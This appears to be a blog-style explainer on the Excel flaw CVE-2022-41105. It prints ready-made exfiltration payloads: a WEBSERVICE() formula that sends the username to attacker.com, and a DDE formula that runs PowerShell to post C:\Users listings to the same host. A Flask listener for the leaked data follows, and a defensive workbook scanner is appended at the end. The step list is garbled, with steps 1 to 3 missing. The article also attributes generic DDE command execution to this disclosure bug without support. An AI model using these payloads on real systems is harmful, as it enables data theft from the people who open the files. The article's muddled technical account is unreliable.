Introduction
In September 2022, security researchers discovered CVE-2022-41105 — a Microsoft Excel Information Disclosure Vulnerability. Many overlooked it as yet another minor Excel bug, but in reality, attackers could harness this flaw to silently leak sensitive user data. If you think opening an innocent spreadsheet is always safe, keep reading.
This article breaks down what CVE-2022-41105 is, demonstrates how it works, and provides a practical demonstration with sample code. It's written in straightforward terms, so anyone who uses Excel or develops solutions around it should take note.
What is CVE-2022-41105?
CVE-2022-41105 is an Information Disclosure issue in Microsoft Excel. In affected versions (including Office 2016, 2019, 2021, and Office 365 prior to the November 2022 patches), Excel fails to adequately handle data within specially crafted spreadsheet files. When a malicious Excel workbook is opened, the vulnerability could allow attackers to steal information from your computer — sometimes without warning.
Official Microsoft Links
- Microsoft Security Update Guide - CVE-2022-41105
- Microsoft Support — Security Updates November 2022
How the Exploit Works
Excel files can contain various objects, connections, and links, some of which can reference external resources or objects on your computer. CVE-2022-41105 revolves around Excel’s improper handling of these links — particularly when used with legacy Dynamic Data Exchange (DDE) or OLE objects.
Victim opens the file.
4. Excel silently leaks information — sometimes even just the path to a local file or, in some scenarios, content from that file — to a server controlled by the attacker.
Real-World Example: Stealing Username and Local File Paths
Let's create a simplified PoC (proof of concept) using the 'External Links' technique, which is a common vector. This leverages Excel formulas that reference local environment variables, which can indirectly reveal usernames and folder structures.
Malicious Formula Example
=WEBSERVICE("http://attacker.com/log?user="&USER())
- USER() retrieves the username of the computer opening the document.
- WEBSERVICE() attempts to fetch a remote resource, which in this case sends your username to the attacker’s server.
Depending on user settings and patch level, this may happen silently.
But CVE-2022-41105 is more generic. Attackers could craft links that reference files on your disk; when the workbook is opened, these cause Excel to send unintended contents or paths to the attacker's server using DDE/OLE/WEBSERVICE or embedded objects.
DDE Attack Example (Classic and Works Pre-patch)
=cmd|' /C powershell -Command "Invoke-WebRequest -Uri http://attacker.com/leak -Body (Get-ChildItem C:\Users)"'!A
Put this in a cell as a formula (in an older, unpatched Excel) or package it via an OLE Object. When opened, Excel could execute the command, sending directory info to the remote server.
Attacker’s Server Code Example (Python Flask):
from flask import Flask, request

app = Flask(__name__)

# Print the query string of every request that reaches /log
@app.route('/log')
def log():
    print("Received:", request.args)
    return 'OK'

if __name__ == '__main__':
    app.run(host='...', port=80)

=WEBSERVICE("http://your-ip/log?user=" & USER())
Mitigation
- Patch your Office/Excel installations. The fix is included in the November 2022 cumulative updates.
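A defensive check for the formula shapes discussed above, as an added example (not code from the original article or from Microsoft): it scans an .xlsx package for WEBSERVICE() formulas, DDE-style formulas and DDE external-link parts. The function names, the collector.example host and the sample workbook are constructed for illustration.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Formula shapes from the article: WEBSERVICE() calls and DDE "service|'topic'!item".
WEBSERVICE_RE = re.compile(r"\bWEBSERVICE\s*\(", re.IGNORECASE)
DDE_RE = re.compile(r"^\s*=?\s*[\w.]+\s*\|\s*'.*'\s*!", re.DOTALL)

def scan_workbook(data):
    """Return sorted (part, kind, detail) findings for an .xlsx given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            in_sheet = name.startswith("xl/worksheets/") and name.endswith(".xml")
            in_link = name.startswith("xl/externalLinks/") and name.endswith(".xml")
            if not (in_sheet or in_link):
                continue
            # Stdlib parser for portability; prefer a hardened one (e.g. defusedxml) on untrusted files.
            for el in ET.fromstring(zf.read(name)).iter():
                tag = el.tag.rsplit("}", 1)[-1]  # drop the XML namespace
                text = el.text or ""
                if in_sheet and tag == "f":  # <f> holds a cell formula
                    if WEBSERVICE_RE.search(text):
                        findings.append((name, "webservice", text))
                    elif DDE_RE.match(text):
                        findings.append((name, "dde-formula", text))
                elif in_link and tag == "ddeLink":  # DDE link stored as an external-link part
                    detail = el.get("ddeService", "") + "|" + el.get("ddeTopic", "")
                    findings.append((name, "dde-link", detail))
    return sorted(findings)

def build_sample():
    """Constructed test package (minimal, not schema-complete), not a captured file."""
    ns = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
    cells = ['WEBSERVICE("http://collector.example/log?x="&amp;A2)',
             "cmd|'PLACEHOLDER'!A0", "SUM(1,2)"]
    body = "".join(f"<c><f>{c}</f></c>" for c in cells)
    sheet = f'<worksheet xmlns="{ns}"><sheetData>{body}</sheetData></worksheet>'
    link = (f'<externalLink xmlns="{ns}">'
            '<ddeLink ddeService="cmd" ddeTopic="PLACEHOLDER-TOPIC"/></externalLink>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/worksheets/sheet1.xml", sheet)
        zf.writestr("xl/externalLinks/externalLink1.xml", link)
    return buf.getvalue()

if __name__ == "__main__":
    for finding in scan_workbook(build_sample()):
        print(finding)
```

A hit is a triage signal rather than proof of malice, since WEBSERVICE() also has legitimate uses.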
Conclusion
CVE-2022-41105 might sound like technical mumbo-jumbo, but it’s a real risk: Opening weaponized Excel files could leak sensitive information off your network. Microsoft has since patched the flaw, but it’s an important reminder that even old apps like Excel can present modern dangers.
Note: This article is for educational purposes. Do not use these techniques without authorization. Patch your software!
Timeline
Published on: 11/09/2022 22:15:00 UTC
Last modified on: 11/10/2022 00:33:00 UTC